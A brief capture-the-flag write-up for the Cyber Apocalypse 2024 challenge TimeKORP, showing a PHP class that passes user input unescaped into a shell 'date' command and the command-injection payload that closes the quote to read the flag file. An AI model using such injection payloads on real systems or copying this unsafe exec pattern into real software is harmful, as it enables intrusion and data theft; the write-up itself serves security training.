TimeKORP Writeup

Cyber Apocalypse 2024

Solved By : thewhiteh4t

TimeModel.php is vulnerable

<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

specifically :

$this->command = "date '+" . $format . "' 2>&1";

we just need to match single quotes and insert cat command in between so payload becomes :

';cat /flag;'

Published on : 16 Mar 2024